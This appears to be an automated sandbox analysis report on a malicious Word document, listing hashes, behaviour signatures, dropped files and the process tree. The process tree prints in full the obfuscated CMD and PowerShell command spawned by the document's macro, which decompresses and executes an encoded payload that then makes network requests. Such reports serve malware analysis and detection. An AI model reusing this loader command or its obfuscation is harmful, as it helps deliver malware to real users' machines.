Analysis

  • max time kernel
    101s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-09-2024 06:53

General

  • Target

    ef45263ef69dd1ba6535d2794ca3411c_JaffaCakes118.doc

  • Size

    79KB

  • MD5

    ef45263ef69dd1ba6535d2794ca3411c

  • SHA1

    0f5d17b848a239c75ee84c5fa70a9dff2b0ca7ad

  • SHA256

    9c0bf5617ef6a3ee5f9a753fbaa7e270ab1aa6f35fd3f2ba5d6dc8fe9b7fc586

  • SHA512

    518c0e2d080800cef61e3f3d743bea79adb115bae186198bddd53b6db3f8798811e3337dba3388c1fdd5379699fa23e76c3c2d28f38d835461135295a9594751

  • SSDEEP

    768:Dx0zyA1VucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9MrLUvIbm547GNy:Dx0zyA1ocn1kp59gxBK85fBt+a9M+

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ef45263ef69dd1ba6535d2794ca3411c_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3632
    • C:\Windows\SYSTEM32\CMD.exe
      CMD C:\wiNDOWS\sYsteM32\cMD /c "sET gYT= ^& ((GV '*Mdr*').NAme[3,11,2]-jOIn'')( ((("{54}{109}{71}{74}{136}{44}{104}{96}{36}{80}{141}{43}{28}{132}{21}{137}{34}{105}{10}{49}{72}{87}{145}{69}{100}{11}{37}{16}{13}{48}{130}{76}{45}{59}{82}{15}{26}{5}{0}{52}{40}{101}{135}{83}{29}{120}{140}{88}{129}{62}{66}{84}{118}{112}{86}{131}{123}{50}{134}{126}{75}{115}{125}{57}{117}{111}{60}{35}{103}{79}{46}{77}{65}{58}{90}{73}{32}{39}{41}{138}{93}{19}{7}{8}{22}{116}{127}{61}{23}{122}{99}{70}{102}{53}{142}{113}{67}{47}{133}{31}{128}{68}{144}{12}{95}{108}{97}{91}{56}{24}{64}{85}{106}{51}{78}{30}{1}{110}{119}{89}{94}{4}{2}{3}{6}{81}{143}{25}{92}{33}{14}{17}{38}{20}{27}{121}{114}{18}{55}{124}{98}{139}{9}{107}{42}{63}" -f 'cSy','s','::dEcOMpReSs )','Fyc%{ ne','rESSIOnMode]','JQdLBlG','w-oB','bu','pnX5VFO2ybVy',' ','ESSioN','m.COn','yU+','F','Er(','EI','t]::',' hR','c','ZjRR','_ ,','JeCT ','P','Kc','PO5qT','S','Rf',' [T','ne','UN6dhBb1OvPtaGbJ','[Io.cOmPrE','2d','uG0dHP9sX3/BwBO4Gylr','d','.com','xZ',']-j','vEr','G','/fqWd0cX','hQSk','R7Lw','E','lGZ) (',').Name[3','trING(lGZ','t9','r','rOMBa','.DeFlatestReAM( [sYsTEM.Io','3Cko','lGZ)','UkrEhU0E','c2Mx','. ((','I','u6AL7','H','Zf1+rA','RZDN','9Z','QBXR0P6','U63AO','aDtoEnD()','CD','h+i','E','R','Jm','sY','gDI4AuVbtJDI','GZ*md','.mE','eCDwKxKwlT','r*lG','v','64s','y',',','5hO','oin','JeC','bsIw','FGjhMT','7k','4bwNvSq8','DkOw','MOrySt','8','oM','Uq+oGCYv','Z','TrEamRea','RFDj','P','s','11,2','y',' ','Jhq7OCQD+g3HXT+','StE','vpz','tE','l',',','Pr','bZxkvJGJk+m5aS4=',').r','NF','gv l','sION','G','lw+','E3','AS','On','TqhfU','+','Mo9o6','.C','g3qNDPghij','ext.enCODIng]::','xD6OC','q','i)','J','pc','4ek0U','n6zNpv8','Q','se','xdCBTA1','w-oB','+','mMRDuP','6WX2F2Iif','Z',' Io','t','}','1IF6zAsS','lGZ','8o','T io.','bU+N','REAm][')) -rEPLaCe([chAR]108+[chAR]71+[chAR]90),[chAR]39-creplACe 'hRG',[chAR]36 -creplACe([chAR]70+[chAR]121+[chAR]99),[chAR]124) ) && PoWersHELL SET-itEM VarIaBlE:tl32V ( [TYPE](\"{1}{2}{0}\"-f 'meNT','EnviRO','N') ); (.( \"{1}{2}{0}\"-f'Tem','Get-cHI','LDI') (\"{0}{2}{1}{4}{3}\" -f'vari','CutIOnConT','aBLE:eXe','xT','e' )).\"val`Ue\".\"invo`KECo`MMAnD\".\"inV`OkEsc`RipT\"( ( (cHILDiTeM VARiABlE:TL32V ).vaLUE::( \"{1}{5}{0}{4}{2}{3}\"-f 'r','gEtEn','NtvAriabL','e','oNMe','Vi' ).Invoke( 'GyT',( \"{1}{2}{0}\"-f 'CEsS','pR','o') ) ) )"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1036
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PoWersHELL SET-itEM VarIaBlE:tl32V ( [TYPE](\"{1}{2}{0}\"-f 'meNT','EnviRO','N') ); (.( \"{1}{2}{0}\"-f'Tem','Get-cHI','LDI') (\"{0}{2}{1}{4}{3}\" -f'vari','CutIOnConT','aBLE:eXe','xT','e' )).\"val`Ue\".\"invo`KECo`MMAnD\".\"inV`OkEsc`RipT\"( ( (cHILDiTeM VARiABlE:TL32V ).vaLUE::( \"{1}{5}{0}{4}{2}{3}\"-f 'r','gEtEn','NtvAriabL','e','oNMe','Vi' ).Invoke( 'GyT',( \"{1}{2}{0}\"-f 'CEsS','pR','o') ) ) )
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1412

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCDD014.tmp\gb.xsl

    Filesize

    262KB

    MD5

    51d32ee5bc7ab811041f799652d26e04

    SHA1

    412193006aa3ef19e0a57e16acf86b830993024a

    SHA256

    6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

    SHA512

    5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jgvms1pj.lyu.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

    Filesize

    2B

    MD5

    f3b25701fe362ec84616a93a45ce9998

    SHA1

    d62636d8caec13f04e28442a0a6fa1afeb024bbb

    SHA256

    b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

    SHA512

    98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

  • memory/1412-51-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-75-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/1412-58-0x0000019DF72D0000-0x0000019DF72F2000-memory.dmp

    Filesize

    136KB

  • memory/3632-16-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-50-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-12-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-11-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-0-0x00007FFEF10F0000-0x00007FFEF1100000-memory.dmp

    Filesize

    64KB

  • memory/3632-18-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-19-0x00007FFEEEA70000-0x00007FFEEEA80000-memory.dmp

    Filesize

    64KB

  • memory/3632-17-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-15-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-14-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-10-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-6-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-5-0x00007FFEF10F0000-0x00007FFEF1100000-memory.dmp

    Filesize

    64KB

  • memory/3632-3-0x00007FFEF10F0000-0x00007FFEF1100000-memory.dmp

    Filesize

    64KB

  • memory/3632-32-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-46-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-45-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-13-0x00007FFEEEA70000-0x00007FFEEEA80000-memory.dmp

    Filesize

    64KB

  • memory/3632-7-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-9-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-8-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-4-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-71-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-72-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-1-0x00007FFEF10F0000-0x00007FFEF1100000-memory.dmp

    Filesize

    64KB

  • memory/3632-76-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-77-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-78-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-84-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-85-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB

  • memory/3632-2-0x00007FFEF10F0000-0x00007FFEF1100000-memory.dmp

    Filesize

    64KB

  • memory/3632-582-0x00007FFEF10F0000-0x00007FFEF1100000-memory.dmp

    Filesize

    64KB

  • memory/3632-585-0x00007FFEF10F0000-0x00007FFEF1100000-memory.dmp

    Filesize

    64KB

  • memory/3632-584-0x00007FFEF10F0000-0x00007FFEF1100000-memory.dmp

    Filesize

    64KB

  • memory/3632-583-0x00007FFEF10F0000-0x00007FFEF1100000-memory.dmp

    Filesize

    64KB

  • memory/3632-586-0x00007FFF31070000-0x00007FFF31265000-memory.dmp

    Filesize

    2.0MB